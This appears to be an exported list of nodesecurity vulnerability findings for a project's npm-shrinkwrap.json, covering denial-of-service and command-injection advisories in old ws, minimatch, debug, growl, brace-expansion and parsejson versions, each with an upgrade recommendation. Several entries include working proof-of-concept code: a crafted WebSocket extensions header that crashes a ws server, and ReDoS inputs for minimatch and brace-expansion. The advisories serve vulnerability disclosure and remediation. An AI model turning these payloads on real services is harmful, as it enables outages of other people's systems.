hypery2k/tvml-kit-livereload

npm-shrinkwrap.json

ws Denial of Service
Open

    "ws": {
      "version": "1.1.1",
      "from": "ws@1.0.1",
      "resolved": "https://registry.npmjs.org/ws/-/ws-1.0.1.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Denial of Service

Overview:

A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

Proof of concept:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation:

Upgrade to version 3.3.1 or greater

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "0.3.0",
              "from": "minimatch@>=0.3.0 <0.4.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*), which matches against \\.

A proof of concept is as follows:

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// a single "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater

minimatch Regular Expression Denial of Service
Open

        "minimatch": {
          "version": "0.4.0",
          "from": "minimatch@>=0.0.0 <1.0.0",
          "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.4.0.tgz"
        }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*), which matches against \\.

A proof of concept is as follows:

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// a single "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater

debug Regular Expression Denial of Service
Open

            "debug": {
              "version": "0.7.4",
              "from": "debug@0.7.4",
              "resolved": "https://registry.npmjs.org/debug/-/debug-0.7.4.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the %o formatter. It takes around 50k characters to block for 2 seconds, making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series, or to 3.1.0 or greater.

growl Command Injection
Open

    "growl": {
      "version": "1.7.0",
      "from": "growl@>=1.7.0 <1.8.0",
      "resolved": "https://registry.npmjs.org/growl/-/growl-1.7.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Command Injection

Overview:

Growl adds growl notification support to nodejs.

Growl does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.

Recommendation:

Update to version 1.10.2 or greater

brace-expansion ReDoS
Open

    "brace-expansion": {
      "version": "1.1.5",
      "from": "brace-expansion@>=1.0.0 <2.0.0",
      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.5.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example, {1,2,3,4} would expand to 1 2 3 4. brace-expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation:

Upgrade to version 1.1.7 or later.

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@2.2.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the %o formatter. It takes around 50k characters to block for 2 seconds, making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series, or to 3.1.0 or greater.

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "0.3.0",
              "from": "minimatch@>=0.3.0 <0.4.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*), which matches against \\.

A proof of concept is as follows:

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// a single "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater

minimatch Regular Expression Denial of Service
Open

        "minimatch": {
          "version": "0.2.14",
          "from": "minimatch@>=0.2.9 <0.3.0",
          "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.2.14.tgz"
        }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*), which matches against \\.

A proof of concept is as follows:

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// a single "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater

parsejson Regular Expression Denial of Service
Open

    "parsejson": {
      "version": "0.0.1",
      "from": "parsejson@0.0.1",
      "resolved": "https://registry.npmjs.org/parsejson/-/parsejson-0.0.1.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The parsejson module is vulnerable to regular expression denial of service when untrusted user input is passed into it to be parsed.

Recommendation:

Until a fix is available, do not use parsejson to parse JSON. Use JSON.parse() instead if available.
